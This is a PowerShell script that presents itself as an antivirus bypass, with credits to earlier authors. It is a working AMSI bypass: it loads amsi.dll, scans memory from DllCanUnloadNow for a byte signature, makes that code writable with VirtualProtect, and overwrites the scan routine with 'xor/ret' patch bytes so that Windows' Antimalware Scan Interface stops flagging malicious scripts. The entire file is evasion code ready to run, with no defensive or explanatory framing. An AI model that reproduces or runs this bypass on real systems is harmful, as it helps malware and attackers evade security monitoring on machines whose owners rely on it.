function Invoke-AlokS-AvBypass { Write-Host "-- Bypassing Antivirus in Powershell --" Write-Host "--- Script Modified by Alok Saurabh ---" Write-Host "-- Credits to Paul Laîné & Avi Gimpel --" Write-Host "" $Kernel32 = @" using System; using System.Runtime.InteropServices; public class Kernel32 { [DllImport("kernel32")] public static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName); [DllImport("kernel32")] public static extern IntPtr LoadLibrary(string lpLibFileName); [DllImport("kernel32")] public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); } "@ Add-Type $Kernel32 Class Hunter { static [IntPtr] FindAddress([IntPtr]$address, [byte[]]$egg) { while ($true) { [int]$count = 0 while ($true) { [IntPtr]$address = [IntPtr]::Add($address, 1) If ([System.Runtime.InteropServices.Marshal]::ReadByte($address) -eq $egg.Get($count)) { $count++ If ($count -eq $egg.Length) { return [IntPtr]::Subtract($address, $egg.Length - 1) } } Else { break } } } return $address } } [IntPtr]$hModule = [Kernel32]::LoadLibrary("amsi.dll") Write-Host "[+] AMSI DLL Handle: $hModule" [IntPtr]$dllCanUnloadNowAddress = [Kernel32]::GetProcAddress($hModule, "DllCanUnloadNow") Write-Host "[+] DllCanUnloadNow address: $dllCanUnloadNowAddress" If ([IntPtr]::Size -eq 8) { Write-Host "[+] 64-bits process" [byte[]]$egg = [byte[]] ( 0x4C, 0x8B, 0xDC, # mov r11,rsp 0x49, 0x89, 0x5B, 0x08, # mov qword ptr [r11+8],rbx 0x49, 0x89, 0x6B, 0x10, # mov qword ptr [r11+10h],rbp 0x49, 0x89, 0x73, 0x18, # mov qword ptr [r11+18h],rsi 0x57, # push rdi 0x41, 0x56, # push r14 0x41, 0x57, # push r15 0x48, 0x83, 0xEC, 0x70 # sub rsp,70h ) } Else { Write-Host "[+] 32-bits process" [byte[]]$egg = [byte[]] ( 0x8B, 0xFF, # mov edi,edi 0x55, # push ebp 0x8B, 0xEC, # mov ebp,esp 0x83, 0xEC, 0x18, # sub esp,18h 0x53, # push ebx 0x56 # push esi ) } [IntPtr]$targetedAddress = [Hunter]::FindAddress($dllCanUnloadNowAddress, $egg) Write-Host "[+] Targeted address: $targetedAddress" $oldProtectionBuffer = 0 [Kernel32]::VirtualProtect($targetedAddress, [uint32]2, 4, [ref]$oldProtectionBuffer) | Out-Null $patch = [byte[]] ( 0x31, 0xC0, # xor rax, rax 0xC3 # ret ) [System.Runtime.InteropServices.Marshal]::Copy($patch, 0, $targetedAddress, 3) $a = 0 [Kernel32]::VirtualProtect($targetedAddress, [uint32]2, $oldProtectionBuffer, [ref]$a) | Out-Null [int]$p = 27 [IntPtr]$patchloc = [IntPtr]::Add($targetedAddress, $p) $oldProtectionBuffer1 = 0 [Kernel32]::VirtualProtect($patchloc, [uint32]2, 4, [ref]$oldProtectionBuffer1) | Out-Null $patch1 = [byte[]] ( 0x31, 0xff, # xor edi, edi 0x90 # nop ) [System.Runtime.InteropServices.Marshal]::Copy($patch1, 0, $patchloc, 3) $a1 = 0 [Kernel32]::VirtualProtect($patchloc, [uint32]2, $oldProtectionBuffer1, [ref]$a1) | Out-Null #[string]$bytes = "" #[int]$i = 0 #while ($i -lt 31) { # [IntPtr]$targetedAddress = [IntPtr]::Add($targetedAddress, $i) # $bytes += "0x" + [System.BitConverter]::ToString([System.Runtime.InteropServices.Marshal]::ReadByte($targetedAddress)) + " " # $i++ #} #Write-Host "[+] new Bytes: $bytes" }